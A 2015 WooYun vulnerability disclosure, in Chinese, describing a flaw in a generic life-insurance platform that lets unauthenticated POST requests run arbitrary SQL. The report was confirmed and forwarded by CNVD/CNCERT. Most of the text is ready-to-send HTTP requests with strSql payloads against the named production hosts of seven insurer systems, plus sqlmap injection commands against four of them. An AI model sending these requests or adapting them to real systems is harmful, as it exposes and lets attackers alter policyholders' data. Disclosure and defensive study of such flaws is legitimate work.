当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120530

漏洞标题:某保险行业通用系统设计缺陷可直接操作数据库获取敏感数据(影响众多人寿保险)

相关厂商:cncert国家互联网应急中心

漏洞作者: 茜茜公主

提交时间:2015-06-15 10:46

修复时间:2015-09-17 17:28

公开时间:2015-09-17 17:28

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-15: 细节已通知厂商并且等待厂商处理中
2015-06-19: 厂商已经确认,细节仅向厂商公开
2015-06-22: 细节向第三方安全合作伙伴开放
2015-08-13: 细节向核心白帽子及相关领域专家公开
2015-08-23: 细节向普通白帽子公开
2015-09-02: 细节向实习白帽子公开
2015-09-17: 细节向公众公开

简要描述:

I know ,I need a lightning to upgrade ,I need help!

详细说明:

前些时候提了一个华夏保险的漏洞
WooYun: 看我如何在前台任意操作华夏人寿保险某系统数据库

QQ截图20150614210506.jpg


当时没有仔细的去分析数据包,所以在之后寻找其它案例的过程中,访问问题链接后直接跳转到登录页时,令我相当气馁。
比如访问:农银人寿的漏洞页面http://remotebak.abchinalife.cn:7060/ui/common/easyQueryVer3/EasyQueryXML.jsp时,会跳转到http://remotebak.abchinalife.cn:7060/ui/indexlis.jsp让我误以为程序已经做了权限控制。
经过多次测试后我发现,可以用POST方式直接提交,然后,你就可以直接操作该系统的数据库了(增删改查)

POST http://remotebak.abchinalife.cn:7060/ui/common/easyQueryVer3/EasyQueryXML.jsp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://remotebak.abchinalife.cn:7060/ui/indexlis.jsp
Content-Type: application/x-www-form-urlencoded
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Host: remotebak.abchinalife.cn:7060
Content-Length: 48
Connection: Keep-Alive
Pragma: no-cache
Cookie: 
strSql=select+*+from+tabs&strStart=1&LargeFlag=0


QQ截图20150614212027.jpg


select count(*) from LCCONT


QQ截图20150614223228.jpg


QQ截图20150614223408.jpg


QQ截图20150614223729.jpg

漏洞证明:

其它几个案例

国华人寿http://broker.guohualife.com/common/easyQueryVer3/EasyQueryXML.jsp


POST http://broker.guohualife.com/common/easyQueryVer3/EasyQueryXML.jsp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://broker.guohualife.com/indexlis.jsp
Content-Type: application/x-www-form-urlencoded
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Host: broker.guohualife.com
Content-Length: 48
Connection: Keep-Alive
Pragma: no-cache
Cookie: 
strSql=select+*+from+tabs&strStart=1&LargeFlag=0


QQ截图20150614224013.jpg


2000多张表...

QQ截图20150614224159.jpg


随便来张表

select count(*) from ATS_REC_TRANSACTIONS


QQ截图20150614225116.jpg


取前10行

QQ截图20150614225049.jpg


华夏人寿http://gdxt.hxlife.com/ui/common/easyQueryVer3/EasyQueryXML.jsp


POST http://gdxt.hxlife.com/ui/common/easyQueryVer3/EasyQueryXML.jsp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://gdxt.hxlife.com/ui/indexlis.jsp
Content-Type: application/x-www-form-urlencoded
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Host: gdxt.hxlife.com
Content-Length: 48
Connection: Keep-Alive
Pragma: no-cache
Cookie: 
strSql=select+*+from+tabs&strStart=1&LargeFlag=0


QQ截图20150614225829.jpg


取前10行
select * from qlccont where rownum <11

QQ截图20150614225953.jpg


天安人寿http://epos.tianan-life.com/common/easyQueryVer3/EasyQueryXML.jsp


POST http://epos.tianan-life.com/common/easyQueryVer3/EasyQueryXML.jsp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://epos.tianan-life.com/indexlis.jsp
Content-Type: application/x-www-form-urlencoded
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Host: epos.tianan-life.com
Content-Length: 48
Connection: Keep-Alive
Pragma: no-cache
Cookie: 
strSql=select+*+from+tabs&strStart=1&LargeFlag=0


select count(*) from SLCCONT

QQ截图20150614230355.jpg


取前10条数据select * from SLCCONT where rownum <11

QQ截图20150614230518.jpg


君龙人寿团险客户服务平台http://gecss.kdlins.com.cn:8081/gecss/common/easyQueryVer3/EasyQueryXML.jsp


POST http://gecss.kdlins.com.cn:8081/gecss/common/easyQueryVer3/EasyQueryXML.jsp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://gecss.kdlins.com.cn:8081/gecss/indexlis.jsp
Content-Type: application/x-www-form-urlencoded
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Host: gecss.kdlins.com.cn:8081
Content-Length: 48
Connection: Keep-Alive
Pragma: no-cache
Cookie: 
LargeFlag=0&strStart=1&strSql=select+*+from+tabs


QQ截图20150614231211.jpg


QQ截图20150614231211.jpg


君龙人寿短期险出单系统http://zhongjie.kdlins.com.cn:8080/kdlins/common/easyQueryVer3/EasyQueryXML.jsp


POST http://zhongjie.kdlins.com.cn:8080/kdlins/common/easyQueryVer3/EasyQueryXML.jsp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://zhongjie.kdlins.com.cn:8080/kdlins/indexlis.jsp
Content-Type: application/x-www-form-urlencoded
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Host: zhongjie.kdlins.com.cn:8080
Content-Length: 48
Connection: Keep-Alive
Pragma: no-cache
Cookie: 
strSql=select+*+from+tabs&strStart=1&LargeFlag=0


QQ截图20150614231417.jpg


吉祥人寿http://epos.jxlife.com.cn/ter/common/easyQueryVer3/EasyQueryXML.jsp


POST http://epos.jxlife.com.cn/ter/common/easyQueryVer3/EasyQueryXML.jsp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://epos.jxlife.com.cn/ter/indexlis.jsp
Content-Type: application/x-www-form-urlencoded
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Host: epos.jxlife.com.cn
Content-Length: 48
Connection: Keep-Alive
Pragma: no-cache
Cookie: 
strSql=select+*+from+tabs&strStart=1&LargeFlag=0


QQ截图20150614232257.jpg


QQ截图20150614232639.jpg


select * from SLCPOL where rownum <11

QQ截图20150614232724.jpg


该套建站程序,还有一处通用型sql注入,这里一起提出来(有些站被waf拦了)
注入点在/common/cvar/CExec.jsp
在浏览登录页时,系统会加载存在漏洞的jsp文件
详细可查看 WooYun: 农银人寿某系统一个不起眼的页面引发的SQL注射 

python SQLMap/SQLMap.py -u "http://broker.guohualife.com/common/cvar/CExec.jsp" --data "txtVarData=328044&txtOther=328044&txtFrameName=328044&txtSQL=328044&startIndex=328044&txtQueryResult=328044&mOperate=328044&txtCodeCondition=328044&txtConditionField=328044&txtShowWidth=328044&txtCodeName=328044" -p txtCodeCondition --risk 3 --level 3 --current-db


QQ截图20150614233928.jpg


python SQLMap/SQLMap.py -u "http://epos.jxlife.com.cn/ter/common/cvar/CExec.jsp" --data "txtVarData=328044&txtOther=328044&txtFrameName=328044&txtSQL=328044&startIndex=328044&txtQueryResult=328044&mOperate=328044&txtCodeCondition=328044&txtConditionField=328044&txtShowWidth=328044&txtCodeName=328044" -p txtCodeCondition --risk 3 --level 3 --current-db


QQ截图20150614234109.jpg


python SQLMap/SQLMap.py -u "http://remotebak.abchinalife.cn:7060/ui/common/cvar/CExec.jsp" --data "txtVarData=328044&txtOther=328044&txtFrameName=328044&txtSQL=328044&startIndex=328044&txtQueryResult=328044&mOperate=328044&txtCodeCondition=328044&txtConditionField=328044&txtShowWidth=328044&txtCodeName=328044" -p txtCodeCondition --risk 3 --level 3 --current-db


QQ截图20150614234338.jpg


python SQLMap/SQLMap.py -u "http://gdxt.hxlife.com/ui/common/cvar/CExec.jsp" --data "txtVarData=328044&txtOther=328044&txtFrameName=328044&txtSQL=328044&startIndex=328044&txtQueryResult=328044&mOperate=328044&txtCodeCondition=328044&txtConditionField=328044&txtShowWidth=328044&txtCodeName=328044" -p txtCodeCondition --risk 3 --level 3 --current-db


QQ截图20150614234455.jpg

修复方案:

咨询中科软

版权声明:转载请注明来源 茜茜公主@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-06-19 17:28

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向保险行业信息化主管部门通报,由其后续协调网站管理单位处置. 已经由CNVD通过网站公开联系方式向软件生产厂商通报。

最新状态:

暂无